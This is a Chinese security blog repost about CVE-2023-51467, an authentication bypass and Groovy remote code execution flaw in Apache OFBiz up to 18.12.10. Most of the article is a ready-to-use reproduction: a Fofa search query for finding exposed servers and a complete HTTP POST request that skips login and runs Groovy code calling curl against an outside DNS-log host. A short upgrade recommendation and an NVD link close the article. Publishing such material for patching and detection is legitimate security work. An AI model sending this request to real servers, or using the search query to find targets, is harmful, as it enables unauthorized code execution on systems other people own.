(CVE-2023-51467)Apache OFBiz groovy 远程代码执行漏洞

admin
admin
admin
102523
文章
87
评论
2024年1月7日21:57:21评论34 views字数 944阅读3分8秒阅读模式

免责声明:该公众号大部分文章来自作者日常学习,也有部分文章是经过作者授权和其他公众号白名单转载,如需转载,请联系公众号。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

Apache OFBiz groovy 远程代码执行漏洞,攻击者可构造请求绕过身份认证,利用后台相关接口功能执行groovy代码,导致远程代码执行。

0x02 影响平台

Apache OFBiz <= 18.12.10

0x03 漏洞复现

Fofa:app="Apache_OFBiz"

首页:

(CVE-2023-51467)Apache OFBiz groovy 远程代码执行漏洞

构造数据包执行groovy代码

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: Content-Length: 190Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Connection: close
groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29
查看ceye的dnslog记录

(CVE-2023-51467)Apache OFBiz groovy 远程代码执行漏洞

可以自行替dnslog查看是否存在漏洞

0x04 修复建议

升级ofbiz18.12.11或更高版本:https://ofbiz.apache.org/

0x05 参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-51467

原文始发于微信公众号(SheYin):(CVE-2023-51467)Apache OFBiz groovy 远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月7日21:57:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   (CVE-2023-51467)Apache OFBiz groovy 远程代码执行漏洞http://cn-sec.com/archives/2367954.html

发表评论

匿名网友 填写信息